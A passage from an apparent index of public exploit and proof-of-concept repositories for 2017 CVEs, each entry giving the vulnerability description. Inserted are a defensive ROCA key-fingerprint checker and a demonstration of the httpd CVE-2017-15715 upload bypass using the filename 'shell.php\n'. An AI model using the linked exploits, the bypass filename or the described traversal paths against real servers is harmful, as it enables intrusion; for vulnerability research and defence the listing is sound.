- [jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149)
- [Xcatolin/jboss-deserialization](https://github.com/Xcatolin/jboss-deserialization)
- [VVeakee/CVE-2017-12149](https://github.com/VVeakee/CVE-2017-12149)
- [MrE-Fog/jboss-_CVE-2017-12149](https://github.com/MrE-Fog/jboss-_CVE-2017-12149)
- [JesseClarkND/CVE-2017-12149](https://github.com/JesseClarkND/CVE-2017-12149)

### CVE-2017-12426 (2017-08-14)

GitLab Community Edition (CE) and Enterprise Edition (EE) before 8.17.8, 9.0.x before 9.0.13, 9.1.x before 9.1.10, 9.2.x before 9.2.10, 9.3.x before 9.3.10, and 9.4.x before 9.4.4 might allow remote attackers to execute arbitrary code via a crafted SSH URL in a project import.

- [sm-paul-schuette/CVE-2017-12426](https://github.com/sm-paul-schuette/CVE-2017-12426)

### CVE-2017-12542 (2018-02-15)

An authentication bypass and code execution vulnerability in HPE Integrated Lights-out 4 (iLO 4) versions prior to 2.53 was found.

- [skelsec/CVE-2017-12542](https://github.com/skelsec/CVE-2017-12542)
- [sk1dish/ilo4-rce-vuln-scanner](https://github.com/sk1dish/ilo4-rce-vuln-scanner)

### CVE-2017-12561 (2018-02-15)

A remote code execution vulnerability in HPE intelligent Management Center (iMC) PLAT version Plat 7.3 E0504P4 and earlier was found.

- [Everdoh/CVE-2017-12561](https://github.com/Everdoh/CVE-2017-12561)

### CVE-2017-12611 (2017-09-20)

In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to an RCE attack.

- [brianwrf/S2-053-CVE-2017-12611](https://github.com/brianwrf/S2-053-CVE-2017-12611)

### CVE-2017-12615 (2017-09-19)

When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

- [breaktoprotect/CVE-2017-12615](https://github.com/breaktoprotect/CVE-2017-12615)
- [mefulton/cve-2017-12615](https://github.com/mefulton/cve-2017-12615)
- [zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717](https://github.com/zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717)
- [wsg00d/cve-2017-12615](https://github.com/wsg00d/cve-2017-12615)
- [BeyondCy/CVE-2017-12615](https://github.com/BeyondCy/CVE-2017-12615)
- [1337g/CVE-2017-12615](https://github.com/1337g/CVE-2017-12615)
- [Shellkeys/CVE-2017-12615](https://github.com/Shellkeys/CVE-2017-12615)
- [cved-sources/cve-2017-12615](https://github.com/cved-sources/cve-2017-12615)
- [ianxtianxt/CVE-2017-12615](https://github.com/ianxtianxt/CVE-2017-12615)
- [cyberharsh/Tomcat-CVE-2017-12615](https://github.com/cyberharsh/Tomcat-CVE-2017-12615)
- [w0x68y/CVE-2017-12615-EXP](https://github.com/w0x68y/CVE-2017-12615-EXP)
- [tpt11fb/AttackTomcat](https://github.com/tpt11fb/AttackTomcat)
- [xiaokp7/Tomcat_PUT_GUI_EXP](https://github.com/xiaokp7/Tomcat_PUT_GUI_EXP)
- [lizhianyuguangming/TomcatScanPro](https://github.com/lizhianyuguangming/TomcatScanPro)

### CVE-2017-12617 (2017-10-03)

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

- [cyberheartmi9/CVE-2017-12617](https://github.com/cyberheartmi9/CVE-2017-12617)
- [devcoinfet/CVE-2017-12617](https://github.com/devcoinfet/CVE-2017-12617)
- [qiantu88/CVE-2017-12617](https://github.com/qiantu88/CVE-2017-12617)
- [ygouzerh/CVE-2017-12617](https://github.com/ygouzerh/CVE-2017-12617)
- [tyranteye666/tomcat-cve-2017-12617](https://github.com/tyranteye666/tomcat-cve-2017-12617)
- [jptr218/tc_hack](https://github.com/jptr218/tc_hack)
- [LongWayHomie/CVE-2017-12617](https://github.com/LongWayHomie/CVE-2017-12617)
- [K3ysTr0K3R/CVE-2017-12617-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-12617-EXPLOIT)
- [scirusvulgaris/CVE-2017-12617](https://github.com/scirusvulgaris/CVE-2017-12617)
- [yZ1337/CVE-2017-12617](https://github.com/yZ1337/CVE-2017-12617)

### CVE-2017-12624 (2017-11-14)

Apache CXF supports sending and receiving attachments via either the JAX-WS or JAX-RS specifications. It is possible to craft a message attachment header that could lead to a Denial of Service (DoS) attack on a CXF web service provider. Both JAX-WS and JAX-RS services are vulnerable to this attack. From Apache CXF 3.2.1 and 3.1.14, message attachment headers that are greater than 300 characters will be rejected by default. This value is configurable via the property "attachment-max-header-size".

- [tafamace/CVE-2017-12624](https://github.com/tafamace/CVE-2017-12624)

### CVE-2017-12635 (2017-11-14)

Due to differences between the Erlang-based JSON parser and the JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate 'roles' keys used for access control within the database, including the special case '_admin' role that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences mean that if two 'roles' keys are present in the JSON, the second one is used for authorising the document write, but the first 'roles' key is used for subsequent authorization of the newly created user. By design, users cannot assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.

- [assalielmehdi/CVE-2017-12635](https://github.com/assalielmehdi/CVE-2017-12635)
- [cyberharsh/Apache-couchdb-CVE-2017-12635](https://github.com/cyberharsh/Apache-couchdb-CVE-2017-12635)
- [Weisant/CVE-2017-12635-POC](https://github.com/Weisant/CVE-2017-12635-POC)

### CVE-2017-12636 (2017-11-14)

CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.

- [moayadalmalat/CVE-2017-12636](https://github.com/moayadalmalat/CVE-2017-12636)
- [XTeam-Wing/CVE-2017-12636](https://github.com/XTeam-Wing/CVE-2017-12636)

### CVE-2017-12792 (2017-10-02)

Multiple cross-site request forgery (CSRF) vulnerabilities in NexusPHP 1.5 allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) linkname, (2) url, or (3) title parameter in an add action to linksmanage.php.

- [ZZS2017/cve-2017-12792](https://github.com/ZZS2017/cve-2017-12792)

### CVE-2017-12852 (2017-08-15)

The numpy.pad function in Numpy 1.13.1 and older versions is missing input validation. An empty list or ndarray will get stuck in an infinite loop, which can allow attackers to cause a DoS attack.

- [BT123/numpy-1.13.1](https://github.com/BT123/numpy-1.13.1)

### CVE-2017-12943 (2017-08-18)

D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.

- [aymankhalfatni/D-Link](https://github.com/aymankhalfatni/D-Link)
- [d4rk30/CVE-2017-12943](https://github.com/d4rk30/CVE-2017-12943)

### CVE-2017-12945 (2019-11-27)

Insufficient validation of user-supplied input for the Solstice Pod before 2.8.4 networking configuration enables authenticated attackers to execute arbitrary commands as root.

- [aress31/cve-2017-12945](https://github.com/aress31/cve-2017-12945)

### CVE-2017-13089 (2017-10-27)

The http.c:skip_short_body() function is called in some circumstances, such as when processing redirects. When the response is sent chunked in wget before 1.19.2, the chunk parser uses strtol() to read each chunk's length, but doesn't check that the chunk length is a non-negative number. The code then tries to skip the chunk in pieces of 512 bytes by using the MIN() macro, but ends up passing the negative chunk length to connect.c:fd_read(). As fd_read() takes an int argument, the high 32 bits of the chunk length are discarded, leaving fd_read() with a completely attacker controlled length argument.

- [r1b/CVE-2017-13089](https://github.com/r1b/CVE-2017-13089)
- [mzeyong/CVE-2017-13089](https://github.com/mzeyong/CVE-2017-13089)

### CVE-2017-13156 (2017-12-06)

An elevation of privilege vulnerability in the Android system (art). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-64211847.

- [xyzAsian/Janus-CVE-2017-13156](https://github.com/xyzAsian/Janus-CVE-2017-13156)
- [caxmd/CVE-2017-13156](https://github.com/caxmd/CVE-2017-13156)
- [giacomoferretti/janus-toolkit](https://github.com/giacomoferretti/janus-toolkit)
- [tea9/CVE-2017-13156-Janus](https://github.com/tea9/CVE-2017-13156-Janus)
- [M507/CVE-2017-13156](https://github.com/M507/CVE-2017-13156)
- [nahid0x1/Janus-Vulnerability-CVE-2017-13156-Exploit](https://github.com/nahid0x1/Janus-Vulnerability-CVE-2017-13156-Exploit)

### CVE-2017-13208 (2018-01-12)

In receive_packet of libnetutils/packet.c, there is a possible out-of-bounds write due to a missing bounds check on the DHCP response. This could lead to remote code execution as a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1. Android ID: A-67474440.

- [idanshechter/CVE-2017-13208-Scanner](https://github.com/idanshechter/CVE-2017-13208-Scanner)

### CVE-2017-13253 (2018-04-04)

In CryptoPlugin::decrypt of CryptoPlugin.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: 8.0, 8.1. Android ID: A-71389378.

- [tamirzb/CVE-2017-13253](https://github.com/tamirzb/CVE-2017-13253)

### CVE-2017-13286 (2018-04-04)

In writeToParcel and readFromParcel of OutputConfiguration.java, there is a permission bypass due to mismatched serialization. This could lead to a local escalation of privilege where the user can start an activity with system privileges, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: 8.0, 8.1. Android ID: A-69683251.

- [UmVfX1BvaW50/CVE-2017-13286](https://github.com/UmVfX1BvaW50/CVE-2017-13286)

### CVE-2017-13672 (2017-09-01)

QEMU (aka Quick Emulator), when built with the VGA display emulator support, allows local guest OS privileged users to cause a denial of service (out-of-bounds read and QEMU process crash) via vectors involving display update.

- [DavidBuchanan314/CVE-2017-13672](https://github.com/DavidBuchanan314/CVE-2017-13672)

### CVE-2017-13868 (2017-12-25)

An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.

- [bazad/ctl_ctloutput-leak](https://github.com/bazad/ctl_ctloutput-leak)

### CVE-2017-13872 (2017-11-29)

An issue was discovered in certain Apple products. macOS High Sierra before Security Update 2017-001 is affected. The issue involves the "Directory Utility" component. It allows attackers to obtain administrator access without a password via certain interactions involving entry of the root user name.

- [giovannidispoto/CVE-2017-13872-Patch](https://github.com/giovannidispoto/CVE-2017-13872-Patch)

### CVE-2017-14105 (2017-09-01)

HiveManager Classic through 8.1r1 allows arbitrary JSP code execution by modifying a backup archive before a restore, because the restore feature does not validate pathnames within the archive. An authenticated, local attacker - even restricted as a tenant - can add a jsp at HiveManager/tomcat/webapps/hm/domains/$yourtenant/maps (it will be exposed at the web interface).

- [theguly/CVE-2017-14105](https://github.com/theguly/CVE-2017-14105)

### CVE-2017-14262 (2017-09-11)

On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and log in to the device with that hash in the szUserPasswd parameter.

- [zzz66686/CVE-2017-14262](https://github.com/zzz66686/CVE-2017-14262)

### CVE-2017-14263 (2017-09-11)

Honeywell NVR devices allow remote attackers to create a user account in the admin group by leveraging access to a guest account to obtain a session ID, and then sending that session ID in a userManager.addUser request to the /RPC2 URI. The attacker can log in to the device with that new user account to fully control the device.

- [zzz66686/CVE-2017-14263](https://github.com/zzz66686/CVE-2017-14263)

### CVE-2017-14322 (2017-10-18)

The function in init.php that checks whether the user is already logged in, in Interspire Email Marketer (IEM) prior to 6.1.6, allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie with a specially crafted value.

- [joesmithjaffa/CVE-2017-14322](https://github.com/joesmithjaffa/CVE-2017-14322)

### CVE-2017-14491 (2017-10-02)

Heap-based buffer overflow in dnsmasq before 2.78 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted DNS response.

- [skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491](https://github.com/skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491)

### CVE-2017-14493 (2017-10-02)

Stack-based buffer overflow in dnsmasq before 2.78 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted DHCPv6 request.

- [pupiles/bof-dnsmasq-cve-2017-14493](https://github.com/pupiles/bof-dnsmasq-cve-2017-14493)

### CVE-2017-14719 (2017-09-23)

Before version 4.8.2, WordPress was vulnerable to a directory traversal attack during unzip operations in the ZipArchive and PclZip components.

- [PalmTreeForest/CodePath_Week_7-8](https://github.com/PalmTreeForest/CodePath_Week_7-8)

### CVE-2017-14948 (2019-10-14)

Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileaccess.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with 'boundary=' followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution.

- [badnack/d_link_880_bug](https://github.com/badnack/d_link_880_bug)

### CVE-2017-14954 (2017-10-01)

The waitid implementation in kernel/exit.c in the Linux kernel through 4.13.4 accesses rusage data structures in unintended cases, which allows local users to obtain sensitive information, and bypass the KASLR protection mechanism, via a crafted system call.

- [echo-devim/exploit_linux_kernel4.13](https://github.com/echo-devim/exploit_linux_kernel4.13)

### CVE-2017-14980 (2017-10-09)

Buffer overflow in Sync Breeze Enterprise 10.0.28 allows remote attackers to have unspecified impact via a long username parameter to /login.

- [TheDarthMole/CVE-2017-14980](https://github.com/TheDarthMole/CVE-2017-14980)

### CVE-2017-15099 (2017-11-22)

INSERT ... ON CONFLICT DO UPDATE commands in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, and 9.5.x before 9.5.10 disclose table contents that the invoker lacks privilege to read. These exploits affect only tables where the attacker lacks full read access but has both INSERT and UPDATE privileges. Exploits bypass row level security policies and lack of SELECT privilege.

- [ToontjeM/CVE-2017-15099](https://github.com/ToontjeM/CVE-2017-15099)

### CVE-2017-15120 (2018-07-27)

An issue has been found in the parsing of authoritative answers in PowerDNS Recursor before 4.0.8, leading to a NULL pointer dereference when parsing a specially crafted answer containing a CNAME of a different class than IN. An unauthenticated remote attacker could cause a denial of service.

- [shutingrz/CVE-2017-15120_PoC](https://github.com/shutingrz/CVE-2017-15120_PoC)

### CVE-2017-15277 (2017-10-12)

ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.

- [hexrom/ImageMagick-CVE-2017-15277](https://github.com/hexrom/ImageMagick-CVE-2017-15277)

### CVE-2017-15303 (2017-10-16)

In CPUID CPU-Z before 1.43, there is an arbitrary memory write that results directly in elevation of privileges, because any program running on the local machine (while CPU-Z is running) can issue an ioctl 0x9C402430 call to the kernel-mode driver (e.g., cpuz141_x64.sys for version 1.41).

- [hfiref0x/Stryker](https://github.com/hfiref0x/Stryker)

### CVE-2017-15361 (2017-10-16)

The Infineon RSA library 1.02.013 in Infineon Trusted Platform Module (TPM) firmware, such as versions before 0000000000000422 - 4.34, before 000000000000062b - 6.43, and before 0000000000008521 - 133.33, mishandles RSA key generation, which makes it easier for attackers to defeat various cryptographic protection mechanisms via targeted attacks, aka ROCA. Examples of affected technologies include BitLocker with TPM 1.2, YubiKey 4 (before 4.3.5) PGP key generation, and the Cached User Data encryption feature in Chrome OS.

- [lva/Infineon-CVE-2017-15361](https://github.com/lva/Infineon-CVE-2017-15361)
- [titanous/rocacheck](https://github.com/titanous/rocacheck)
- [nsacyber/Detect-CVE-2017-15361-TPM](https://github.com/nsacyber/Detect-CVE-2017-15361-TPM)
- [0xxon/zeek-plugin-roca](https://github.com/0xxon/zeek-plugin-roca)
- [0xxon/roca](https://github.com/0xxon/roca)
- [Elbarbons/ROCA-attack-on-vulnerability-CVE-2017-15361](https://github.com/Elbarbons/ROCA-attack-on-vulnerability-CVE-2017-15361)
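
The ROCA fingerprint test, as an added example that is neither code from this page nor from the repositories above. Keys produced by the affected Infineon library have primes of the form p = k*M + (65537^a mod M) with M a primorial, so the modulus n = p*q satisfies n mod r in the subgroup generated by 65537 mod r for every small prime r dividing M; the 39 primes below divide M for every affected key size, so one table serves all of them. The two moduli at the bottom are constructed for the demonstration and are not real keys; `modulus_from_hex` assumes the `Modulus=HEX` line printed by `openssl rsa -pubin -noout -modulus`.

```python
# Added example: the ROCA fingerprint test (CVE-2017-15361). Not code from the
# page or the repositories listed above.

PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67,
          71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139,
          149, 151, 157, 163, 167]
GENERATOR = 65537


def subgroup_mask(prime, generator=GENERATOR):
    """Bitmask with bit i set iff i == generator^k mod prime for some k."""
    mask, x = 0, 1
    while not (mask >> x) & 1:      # stop once the cycle returns to a seen residue
        mask |= 1 << x
        x = x * generator % prime
    return mask


MASKS = {r: subgroup_mask(r) for r in PRIMES}


def has_roca_fingerprint(n):
    """True if n mod r lies in <65537 mod r> for all 39 primes.

    A modulus from an unaffected generator passes all 39 tests only with
    negligible probability, so a positive result is a reliable indicator."""
    return all((MASKS[r] >> (n % r)) & 1 for r in PRIMES)


def primorial(primes):
    m = 1
    for p in primes:
        m *= p
    return m


def modulus_from_hex(openssl_modulus_line):
    """Parse `Modulus=HEX...` as printed by openssl rsa -pubin -noout -modulus."""
    return int(openssl_modulus_line.split("=", 1)[-1].strip(), 16)


# Constructed test values (not real keys). A vulnerable modulus is congruent to
# a power of 65537 mod M; multiplying it by 11 forces n mod 11 == 0, which is
# outside the unit subgroup and therefore fails the test.
M = primorial(PRIMES)
EXAMPLE_VULNERABLE = pow(GENERATOR, 12345, M) + 3 * M
EXAMPLE_CLEAN = EXAMPLE_VULNERABLE * 11

if __name__ == "__main__":
    for label, n in (("constructed-vulnerable", EXAMPLE_VULNERABLE),
                     ("constructed-clean", EXAMPLE_CLEAN)):
        print(label, "ROCA fingerprint" if has_roca_fingerprint(n) else "no fingerprint")
```

The fingerprint only tells you that a key has the vulnerable structure; recovering the private key is a separate, key-size-dependent computation. For a fleet check, feed `modulus_from_hex` the output of `openssl rsa -pubin -in key.pem -noout -modulus` for each public key, and treat any positive as a key to replace rather than a finding to triage.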

### CVE-2017-15394 (2018-02-07)

Insufficient Policy Enforcement in Extensions in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to perform domain spoofing in permission dialogs via IDN homographs in a crafted Chrome Extension.

- [sudosammy/CVE-2017-15394](https://github.com/sudosammy/CVE-2017-15394)

### CVE-2017-15428 (2019-01-09)

Insufficient data validation in V8 builtins string generator could lead to out of bounds read and write access in V8 in Google Chrome prior to 62.0.3202.94 and allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.

- [w1ldb1t/CVE-2017-15428](https://github.com/w1ldb1t/CVE-2017-15428)

### CVE-2017-15708 (2017-12-11)

In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 and all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allow remote code execution attacks that can be performed by injecting specially crafted serialized objects, and the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in the Synapse distribution makes this exploitable. To mitigate the issue, RMI access needs to be limited to trusted users only. Further, upgrading to version 3.0.1 eliminates the risk from the said Commons Collections version: in Synapse 3.0.1, Commons Collections has been updated to version 3.2.2.

- [HuSoul/CVE-2017-15708](https://github.com/HuSoul/CVE-2017-15708)

### CVE-2017-15715 (2018-03-26)

In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.

- [whisp1830/CVE-2017-15715](https://github.com/whisp1830/CVE-2017-15715)
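
The anchoring mismatch behind this issue, shown as an added example that is not httpd code or the PoC above. Python's `re`, like the PCRE library httpd uses, lets `$` match just before a string-final newline, while Python's `\Z` (PCRE `\z`) matches only at the true end of the string. The upload gate and handler lookup below are stand-ins constructed for the demonstration: the gate models an external filter that checks the literal suffix, and `handler_for` models `<FilesMatch PATTERN> SetHandler application/x-httpd-php`.

```python
import re

# Added example: why "shell.php\n" passes a literal-suffix upload check yet is
# still dispatched to PHP by a `$`-anchored <FilesMatch>. Not httpd code.


def upload_gate_blocks(filename):
    """Stand-in for an external upload filter that looks only at the literal suffix."""
    return filename.endswith((".php", ".phtml", ".phar"))


def handler_for(filename, files_match_pattern):
    """Stand-in for <FilesMatch files_match_pattern> SetHandler application/x-httpd-php."""
    return "php" if re.search(files_match_pattern, filename) else "default"


def bypass_possible(filename, files_match_pattern):
    """True when the gate accepts the name but httpd would still route it to PHP."""
    return (not upload_gate_blocks(filename)
            and handler_for(filename, files_match_pattern) == "php")


DOLLAR_ANCHORED = r"\.(php|phtml|phar)$"   # as commonly written in httpd.conf
END_ANCHORED = r"\.(php|phtml|phar)\Z"     # \Z in Python == \z in PCRE: true end only

if __name__ == "__main__":
    for name in ("shell.php", "shell.php\n", "image.png"):
        print(repr(name),
              "dollar-anchored bypass:", bypass_possible(name, DOLLAR_ANCHORED),
              "end-anchored bypass:", bypass_possible(name, END_ANCHORED))
```

Beyond upgrading past 2.4.29, write the anchor as `\z` in httpd patterns so they cannot match before a trailing newline, and have the upload path reject or strip control characters in filenames so the two checks agree on what "the end of the name" is.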

### CVE-2017-15944 (2017-12-11)

Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.

- [xxnbyy/CVE-2017-15944-POC](https://github.com/xxnbyy/CVE-2017-15944-POC)
- [surajraghuvanshi/PaloAltoRceDetectionAndExploit](https://github.com/surajraghuvanshi/PaloAltoRceDetectionAndExploit)
- [yukar1z0e/CVE-2017-15944](https://github.com/yukar1z0e/CVE-2017-15944)
- [3yujw7njai/PaloAlto_EXP](https://github.com/3yujw7njai/PaloAlto_EXP)

### CVE-2017-15950 (2017-10-31)

Flexense SyncBreeze Enterprise version 10.1.16 is vulnerable to a buffer overflow that can be exploited for arbitrary code execution. The flaw is triggered by providing a long input into the "Destination directory" field, either within an XML document or through use of passive mode.

- [rnnsz/CVE-2017-15950](https://github.com/rnnsz/CVE-2017-15950)

### CVE-2017-16082 (2018-06-07)

A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are two likely scenarios in which one would be vulnerable. 1) Executing unsafe, user-supplied SQL which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.

- [nulldreams/CVE-2017-16082](https://github.com/nulldreams/CVE-2017-16082)

### CVE-2017-16088 (2018-06-07)

The safe-eval module describes itself as a safer version of eval. By accessing the object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox.

- [Flyy-yu/CVE-2017-16088](https://github.com/Flyy-yu/CVE-2017-16088)

### CVE-2017-16245
- [AOCorsaire/CVE-2017-16245](https://github.com/AOCorsaire/CVE-2017-16245)

### CVE-2017-16524 (2017-11-06)

Web Viewer 1.0.0.193 on Samsung SRN-1670D devices suffers from an Unrestricted file upload vulnerability: 'network_ssl_upload.php' allows remote authenticated attackers to upload and execute arbitrary PHP code via a filename with a .php extension, which is then accessed via a direct request to the file in the upload/ directory. To authenticate for this attack, one can obtain web-interface credentials in cleartext by leveraging the existing Local File Read Vulnerability referenced as CVE-2015-8279, which allows remote attackers to read the web-interface credentials via a request for the cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.

- [realistic-security/CVE-2017-16524](https://github.com/realistic-security/CVE-2017-16524)

### CVE-2017-16541 (2017-11-04)

Tor Browser before 7.0.9 on macOS and Linux allows remote attackers to bypass the intended anonymity feature and discover a client IP address via vectors involving a crafted web site that leverages file:// mishandling in Firefox, aka TorMoil. NOTE: Tails is unaffected.

- [Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541](https://github.com/Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541)

### CVE-2017-16567 (2017-11-09)

Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a "favorite."

- [dewankpant/CVE-2017-16567](https://github.com/dewankpant/CVE-2017-16567)

### CVE-2017-16568 (2017-11-09)

Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a radio URL.

- [dewankpant/CVE-2017-16568](https://github.com/dewankpant/CVE-2017-16568)

### CVE-2017-16651 (2017-11-09)

Roundcube Webmail before 1.1.10, 1.2.x before 1.2.7, and 1.3.x before 1.3.3 allows unauthorized access to arbitrary files on the host's filesystem, including configuration files, as exploited in the wild in November 2017. The attacker must be able to authenticate at the target system with a valid username/password as the attack requires an active session. The issue is related to file-based attachment plugins and _task=settings&_action=upload-display&_from=timezone requests.

- [ropbear/CVE-2017-16651](https://github.com/ropbear/CVE-2017-16651)
- [sephiroth950911/CVE-2017-16651-Exploit](https://github.com/sephiroth950911/CVE-2017-16651-Exploit)

### CVE-2017-16720 (2018-01-05)

A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device.

- [CN016/WebAccess-CVE-2017-16720-](https://github.com/CN016/WebAccess-CVE-2017-16720-)

### CVE-2017-16744 (2018-08-20)

A path traversal vulnerability in Tridium Niagara AX Versions 3.8 and prior and Niagara 4 systems Versions 4.4 and prior installed on Microsoft Windows Systems can be exploited by leveraging valid platform (administrator) credentials.

- [GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara](https://github.com/GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara)

### CVE-2017-16778 (2019-12-24)

An access control weakness in the DTMF tone receiver of Fermax Outdoor Panel allows physical attackers to inject a Dual-Tone-Multi-Frequency (DTMF) tone to invoke an access grant that would allow physical access to a restricted floor/level. By design, only a residential unit owner may allow such an access grant. However, due to incorrect access control, an attacker could inject it via the speaker unit to perform an access grant to gain unauthorized access, as demonstrated by a loud DTMF tone representing '1' and a long '#' (697 Hz and 1209 Hz, followed by 941 Hz and 1477 Hz).

- [breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection](https://github.com/breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection)

### CVE-2017-16806 (2017-11-13)

The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal.

- [rickoooooo/ulteriusExploit](https://github.com/rickoooooo/ulteriusExploit)

### CVE-2017-16943 (2017-11-25)

The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands.

- [beraphin/CVE-2017-16943](https://github.com/beraphin/CVE-2017-16943)

### CVE-2017-16994 (2017-11-27)

The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.

- [jedai47/CVE-2017-16994](https://github.com/jedai47/CVE-2017-16994)

### CVE-2017-16995 (2017-12-22)

The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.

- [C0dak/CVE-2017-16995](https://github.com/C0dak/CVE-2017-16995)
- [Al1ex/CVE-2017-16995](https://github.com/Al1ex/CVE-2017-16995)
- [gugronnier/CVE-2017-16995](https://github.com/gugronnier/CVE-2017-16995)
- [senyuuri/cve-2017-16995](https://github.com/senyuuri/cve-2017-16995)
- [vnik5287/CVE-2017-16995](https://github.com/vnik5287/CVE-2017-16995)
- [littlebin404/CVE-2017-16995](https://github.com/littlebin404/CVE-2017-16995)
- [Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-](https://github.com/Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-)
- [ph4ntonn/CVE-2017-16995](https://github.com/ph4ntonn/CVE-2017-16995)
- [ivilpez/cve-2017-16995.c](https://github.com/ivilpez/cve-2017-16995.c)
- [fei9747/CVE-2017-16995](https://github.com/fei9747/CVE-2017-16995)
- [anldori/CVE-2017-16995](https://github.com/anldori/CVE-2017-16995)
- [mareks1007/cve-2017-16995](https://github.com/mareks1007/cve-2017-16995)
- [ZhiQiAnSecFork/cve-2017-16995](https://github.com/ZhiQiAnSecFork/cve-2017-16995)

### CVE-2017-16997 (2017-12-18)

